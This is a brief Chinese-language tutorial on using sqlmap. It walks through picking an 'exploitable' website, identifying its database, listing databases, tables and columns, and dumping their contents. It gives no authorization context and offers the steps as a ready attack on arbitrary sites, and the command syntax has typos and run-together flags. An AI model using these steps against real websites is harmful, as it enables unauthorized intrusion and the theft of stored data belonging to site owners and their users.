1.首先在控制台输入sqlmap-h查看相关参数
2.找到一个可利用的网址,判断网站数据库类型,命令格式为:salmap-u
3。回车确定查看目标数据库信息,已查处目标数据库为mysql5.0.12
4.确定数据库类型为mysql后,查看存在的数据库,命令格式为:sqlmap-u目标网址–dbs回车
5.查看数据库中存在的表,命令格式为:sqlmap-u目标网址–tables-D数据库名,回车
6.这时我们已经得到了两张表,开始获取第一个表中的字段,命令格式为:sqlmap-u目标网址–columns-T表名-D数据库名
7.猜解出字段,查看表里的存储内容,命令格式为:sqlmap-u目标网址–dump-C字段名称-T表名-D数据库名,回车就可以查看你想要得到的数据库了。